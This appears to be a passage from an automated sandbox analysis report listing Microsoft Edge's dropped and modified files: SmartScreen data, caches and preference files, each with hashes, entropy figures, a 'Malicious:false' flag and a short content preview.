                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                  MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                  SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                  SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                  SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:downloadCache_

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.991139310853571
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfaOJozRLuLgfGBkGAeekVy8Hfjg9PIAclWASWXV:YWLSGT5Jo9LuLgfGBPAzkVj/EMlW5WF
                                                                                                                                                                                                                                                                                  MD5:034651DEC5878041B50B6F2EB1E060B3
                                                                                                                                                                                                                                                                                  SHA1:453E7A9601F134530CE0CE289C3F5F4143B0308D
                                                                                                                                                                                                                                                                                  SHA-256:1DC9BD86635D705EB363EAE41A7E3CFB09283C3CBE016BC3E0F044A0E083903C
                                                                                                                                                                                                                                                                                  SHA-512:A57D0707DFEC101070AC12B5F3C19EDE6243805473E4CEDEEDB1D89E4B5220BC6F1A1008EA4D1820B327FA51DA482BF45D215258C65C34A255BDF40BF802E689
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"43cfda3051b96ca9","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953303369247}]}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.026461567818005
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfaOJozRLuLgfGBkGAeekVy8HfzXNPIAclWAdSdAY:YWLSGT5Jo9LuLgfGBPAzkVj/T8lWbd9
                                                                                                                                                                                                                                                                                  MD5:49E47D5BA6AD1FEC8A363AC33B1187D9
                                                                                                                                                                                                                                                                                  SHA1:FCCF2A0D89AA103793D0203E829270FBC09F3DEB
                                                                                                                                                                                                                                                                                  SHA-256:CE57F9015C0446AF7A8E3196AEEA764411A0F5812DB1101158C9B48DABBE5F13
                                                                                                                                                                                                                                                                                  SHA-512:5D3C03F713F8996EFE344874B535EE492C012C7C9C2581B39A8E8D8341D23DB2C4AED26E72555E66E473F7B9280109640C3C213B3B8C1356ACAC56585C2FB095
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"43cfda3051b96ca9","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953299785837}]}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.389669793590032
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                                                                                                                                                  MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                                                                                                                                                  SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                                                                                                                                                  SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                                                                                                                                                  SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a06692da-1a9f-4f85-b9a5-70bf6949c6c6.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9453
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.592656881503978
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkE1Je4WJk1cEX:u+sNwh7sWViRUdAIxBhaE1Mk1ZVG+
                                                                                                                                                                                                                                                                                  MD5:9689BB39B34C4262FFE6A272E8C580B6
                                                                                                                                                                                                                                                                                  SHA1:1E2144980A33D7308667B1C8E14B3F58FC6DF839
                                                                                                                                                                                                                                                                                  SHA-256:91CFCB242BB4379FD61F6174BDE0B58AC95E1CA8A93E01D5D836412D929C774C
                                                                                                                                                                                                                                                                                  SHA-512:7641FE6720F45B110516630BC524C8B53557A7304EBA1FACFFCE0C25BE8352DAE61169A967B39C11513D195B2675BED30C3F8D05A463DB8890BDEECC4D48A359
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a13aa350-a7fa-4391-a018-7c5660d78979.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22947
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.045027927323956
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:atMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhQF6w8T1ttYoA7ieJNH1NinfE:eMkbJrT8IeQc5d19w8T1tKoAOY1NiM
                                                                                                                                                                                                                                                                                  MD5:DFB5020D6179CFF65434ECB4E9C36A19
                                                                                                                                                                                                                                                                                  SHA1:24A28C402051DAC0519C60C33AC34B7D8A7B700B
                                                                                                                                                                                                                                                                                  SHA-256:85E2D147B938EE844BA9E4C9BA7BDD7C96BEE6E53BC0C599F61D080FABBE2CD6
                                                                                                                                                                                                                                                                                  SHA-512:10ADC957AB2D7D036F22144D54BCB936EB4CB28BB936CC26B481FD25156D35028FDE77D747CA4FAAE646B3BF9A599533F35E71F02AD0135EBA5C6BFB3F213049
                                                                                                                                                                                                                                                                                  Malicious:false
